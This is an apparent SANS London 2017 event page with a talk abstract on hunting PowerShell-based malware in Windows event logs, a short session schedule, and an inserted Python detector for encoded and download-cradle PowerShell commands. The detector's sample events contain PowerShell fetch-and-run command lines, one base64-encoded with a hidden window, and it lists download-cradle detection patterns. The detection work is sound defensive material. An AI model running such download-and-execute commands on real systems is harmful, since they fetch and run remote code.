
London November 2017

London, United Kingdom | Mon, Nov 27, 2017 - Sat, Dec 2, 2017

Threat hunting through Windows event logs: Introducing DeepBlueCLI v2

  • Eric Conrad
  • Monday, November 27th, 7:00pm - 8:00pm

Recent malware attacks leverage PowerShell for post-exploitation. Why? There is no EXE for antivirus or HIPS to squash, nothing is saved to the filesystem, sites that use application whitelisting allow PowerShell, and there is little to no default logging.

Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post-exploitation) via event logs, after making small tweaks to the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging.
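Added here as an illustration of the kind of check the talk describes, not DeepBlueCLI's own code (its checks and output format are its own): a small Python hunter over constructed 4688 (process creation with command line) and 4104 (script block) records that decodes -EncodedCommand payloads and flags the common PowerShell indicators. The field names and the sample events are assumptions made for the example.

```python
import base64
import re
# Constructed sample records (not real telemetry) with the fields hunted from Security
# event 4688 (process creation, command line auditing on) and PowerShell event 4104 (script block logging).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"id": 4688, "command_line": r"notepad.exe C:\notes.txt"},
    {"id": 4688, "command_line": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"id": 4104, "script_block": r"Get-ChildItem C:\Users | Select-Object Name"},
    {"id": 4104, "script_block": "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/b.ps1')"},
]
# -EncodedCommand (and its abbreviations) hides the script as base64 over UTF-16LE, so it must be decoded to be hunted.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "profile bypass": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def decode_encoded_command(b64):
    """Return the plaintext of an -EncodedCommand argument, or '' if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_event(event):
    """Return the names of the indicators that fire on one 4688 or 4104 record."""
    if event["id"] == 4688:
        text = event["command_line"]
        if "powershell" not in text.lower():  # only PowerShell launches matter here
            return []
    elif event["id"] == 4104:
        text = event["script_block"]
    else:
        return []
    findings = []
    match = ENC_RE.search(text)
    if match:
        findings.append("encoded command")
        text += " " + decode_encoded_command(match.group(1))  # hunt inside the decoded payload too
    findings += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return findings

def scan_events(events):
    """Map the index of every event that produced findings to those findings."""
    return {i: f for i, e in enumerate(events) if (f := analyze_event(e))}
```

On real data the same logic applies to the CommandLine field of 4688 (once "Include command line in process creation events" is enabled) and the ScriptBlockText field of 4104.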


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
Monday, November 27
Session | Speaker | Time | Type
Threat hunting through Windows event logs: Introducing DeepBlueCLI v2 | Eric Conrad | Monday, November 27th, 7:00pm - 8:00pm | SANS@Night

Tuesday, November 28
Session | Speaker | Time | Type
So, You Wanna be a Pentester? | Adrien de Beaupre | Tuesday, November 28th, 6:00pm - 7:00pm | SANS@Night

Wednesday, November 29
Session | Speaker | Time | Type
The 14 Absolute Truths of Security | Keith Palmgren | Wednesday, November 29th, 6:00pm - 7:00pm | SANS@Night